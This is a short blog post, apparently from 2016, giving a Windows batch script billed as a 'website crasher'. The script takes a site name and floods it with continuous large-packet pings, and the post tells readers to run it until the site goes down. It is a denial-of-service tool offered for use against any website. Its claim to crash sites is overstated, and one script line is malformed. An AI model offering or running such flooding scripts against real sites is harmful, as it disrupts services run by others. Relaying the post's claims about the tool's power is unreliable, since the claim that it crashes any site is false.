Saturday, 16 July 2016

How to crash any website using cmd


Web site crasher, Today i will show you how to crash a small site in seconds with batch files.
so, first of all open notepad and write the codes given below:-
_________________________________________________________________________________

:A
@echo off
Title Website Crasher
color 0e
echo Enter the website you would like to crash
set input=
set /p input= Enter your Website here:
if %input%==goto A if NOT B
echo Processing Your request
ping localhost>nul
echo To end Crashing press CTRL + C
ping localhost>nul
cls
echo ----------------------------------------------------------------------
echo Now Crashing Website...DO NOT CLOSE THIS BOX!! PRESS CRTL + C TO END!!
echo ----------------------------------------------------------------------
ping %input% -t -l 1000
________________________________________________________________________

save the file as Website+crasher.bat
and run it enter the name of website you wish to crash and press enter and wait until site get down

No comments:

Post a Comment